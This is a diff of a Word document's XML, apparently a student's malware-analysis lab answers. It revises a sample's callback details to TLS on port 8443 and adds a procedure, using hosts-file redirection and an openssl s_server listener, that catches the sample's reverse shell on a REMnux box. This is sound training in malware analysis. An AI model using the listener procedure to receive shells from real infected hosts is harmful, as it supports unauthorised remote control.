+              <v:rect w14:anchorId="76F3BBCA" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:253.8pt;margin-top:100.85pt;width:102.5pt;height:4.5pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" o:gfxdata="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" filled="f" strokecolor="red" strokeweight="1pt"/>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67417D3B" wp14:editId="27609AE8">
+            <wp:extent cx="5865495" cy="2680970"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
+            <wp:docPr id="43755004" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="43755004" name="Picture 43755004"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5865495" cy="2680970"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2003,6 +1706,26 @@
         </w:rPr>
         <w:t>The answer is provided in the following screenshot</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This was captured using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>wireshark</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2015,7 +1738,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D5F10F6" wp14:editId="639C6A85">
             <wp:extent cx="5362042" cy="3482977"/>
@@ -2032,7 +1754,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2128,7 +1850,13 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>At detonation the callback port is 53.</w:t>
+        <w:t xml:space="preserve">At detonation the callback port is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>8443.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2185,7 +1913,27 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>The callback protocol is DNS as the sample is trying to contact a domain.</w:t>
+        <w:t xml:space="preserve">The callback protocol is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">TLS/SSL. This can be found via </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>wireshark</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as the DNS resolves the packets that follow gives us details.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2221,6 +1969,28 @@
         <w:pStyle w:val="PlainText"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Ans:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I was not sure of how to do that. Please refer to the answers file in the repo </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -2243,6 +2013,765 @@
         </w:rPr>
         <w:t xml:space="preserve"> - Attempt to get the binary to initiate a shell on the localhost. Does a shell spawn? What is needed for a shell to spawn?</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Since the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>FlareVM</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> machine does not have the capability to acknowledge to the TLS Client Hello message. We might find it difficult to spawn a shell. Even in the walkthrough video for this challenge the instructor told we could set this up in kali and try spawning a shell. I tried and failed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>So</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> when I was going through my course discord I found a procedure to spawn a shell which I will discuss below.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> First </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>goto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the etc\hosts file and point to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>REMnux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> machine for the domain contacted by the binary.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3201EECE" wp14:editId="67A16638">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>left</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>1668780</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2216150" cy="114300"/>
+                <wp:effectExtent l="0" t="0" r="12700" b="19050"/>
+                <wp:wrapNone/>
+                <wp:docPr id="1500134028" name="Rectangle 4"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2216150" cy="114300"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:solidFill>
+                            <a:srgbClr val="FF0000"/>
+                          </a:solidFill>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="2">
+                          <a:schemeClr val="accent1">
+                            <a:shade val="15000"/>
+                          </a:schemeClr>
+                        </a:lnRef>
+                        <a:fillRef idx="1">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="lt1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:rect w14:anchorId="02E6A735" id="Rectangle 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:131.4pt;width:174.5pt;height:9pt;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:middle" o:gfxdata="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" filled="f" strokecolor="red" strokeweight="1pt">
+                <w10:wrap anchorx="margin"/>
+              </v:rect>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770DC104" wp14:editId="6DF84DD1">
+            <wp:extent cx="4845050" cy="3495968"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="368824754" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="368824754" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4847089" cy="3497439"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">First, on the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>REMnux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> box, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">you have </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>to generate a self-signed SSL cert and private key.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>openssl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>req</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -x509 -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>newkey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> rsa:4096 -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>keyout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>key.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -out </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>cert.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -days 365 -nodes </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Then listen for the callback with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>openssl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>openssl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>s_server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -cert </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>cert.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -key </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>key.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -accept 8443</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Run the binary </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02958FBC" wp14:editId="723E08AB">
+            <wp:extent cx="4191000" cy="2690552"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1309884648" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1309884648" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4193626" cy="2692238"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Jump over to your </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>REMnux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> box and you will see a shell spawned.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
